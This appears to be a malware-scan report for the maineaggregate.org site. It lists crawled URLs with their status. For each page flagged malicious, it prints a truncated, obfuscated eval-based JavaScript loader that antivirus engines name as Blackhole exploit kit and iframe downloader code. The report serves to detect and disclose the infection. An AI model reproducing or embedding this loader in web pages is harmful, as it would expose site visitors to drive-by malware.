Request | Server response | Status |
http://www.maineaggregate.org/ | 200 OK Content-Length: 55219 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.maineaggregate.org/node/1 | 200 OK Content-Length: 25880 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.maineaggregate.org/membership | 200 OK Content-Length: 35438 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
https://www.google.com/recaptcha/api/js/recaptcha_ajax.js | 200 OK Content-Length: 115641 Content-Type: text/javascript | clean |
http://www.maineaggregate.org/misc/jquery.js?J | 200 OK Content-Length: 31028 Content-Type: application/javascript | clean |
http://www.maineaggregate.org/misc/drupal.js?J | 200 OK Content-Length: 9774 Content-Type: application/javascript | clean |
http://www.maineaggregate.org/sites/all/modules/captcha/captcha.js?J | 200 OK Content-Length: 1317 Content-Type: application/javascript | clean |
http://www.maineaggregate.org/modules/webform/js/webform.js?J | 200 OK Content-Length: 2860 Content-Type: application/javascript | clean |
http://www.maineaggregate.org/directors | 200 OK Content-Length: 27311 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.maineaggregate.org/node/6 | 200 OK Content-Length: 26917 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.maineaggregate.org/links | 200 OK Content-Length: 30458 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.maineaggregate.org/node/15 | 200 OK Content-Length: 25817 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.maineaggregate.org/node/47 | 200 OK Content-Length: 26217 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.maineaggregate.org/node/45 | 200 OK Content-Length: 27489 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|
http://www.maineaggregate.org/https%3A/%252Fassociatedgeneral.smartevents.com/public/events/spring-thaw-2014 | 200 OK Content-Length: 27560 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) htqite="y";djtp="d"+"o"+"c"+"ument";try{+function(){if(document.querySelector)++(window[djtp].body)==null}()}catch(qrw){kzpx=function(gnkn){gnkn="fr"+"omCh"+gnkn;for(uabw=0;uabw<htqite.length;uabw++){doj+=String[gnkn](gly(asa+(htqite[uabw]))-(31));}};};gly=(eval);asa="0x";shozor=0;try{;}catch(tql){shozor=1}if(!shozor){try{++gly(djtp)["bo"+"d"+htqite]}catch(qrw){kjtm="^";}htqite="3f^85^94^8d^82^93^88^8e^8d^3f^83^97^8a^80^81^4f^58^47^48^3f^9a^2c^29^3f^95^80^91^3f^92^93^80^93^88^82^5c^46^80^89^8
... 3702 bytes are skipped ...7^3f^8b^84^8d^4b^3f^84^8d^83^3f^48^3f^48^5a^2c^29^9c^2c^29^88^85^3f^47^8d^80^95^88^86^80^93^8e^91^4d^82^8e^8e^8a^88^84^64^8d^80^81^8b^84^83^48^2c^29^9a^2c^29^88^85^47^66^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^48^5c^5c^54^54^48^9a^9c^84^8b^92^84^9a^72^84^93^62^8e^8e^8a^88^84^47^46^95^88^92^88^93^84^83^7e^94^90^46^4b^3f^46^54^54^46^4b^3f^46^50^46^4b^3f^46^4e^46^48^5a^2c^29^2c^29^83^97^8a^80^81^4f^58^47^48^5a^2c^29^9c^2c^29^9c".split(kjtm);doj="";kzpx("arCode");gly(""+doj);}Antivirus reports:- AntiVir
- JS/Blacole.NY.6
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.BN
- nProtect
- JS:Exploit.BlackHole.BN
- Comodo
- TrojWare.JS.iFrame.D
- Emsisoft
- JS:Exploit.BlackHole.BN (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.det
- MicroWorld-eScan
- JS:Exploit.BlackHole.BN
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.BN
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WU
- GData
- JS:Exploit.BlackHole.BN
- BitDefender
- JS:Exploit.BlackHole.BN
|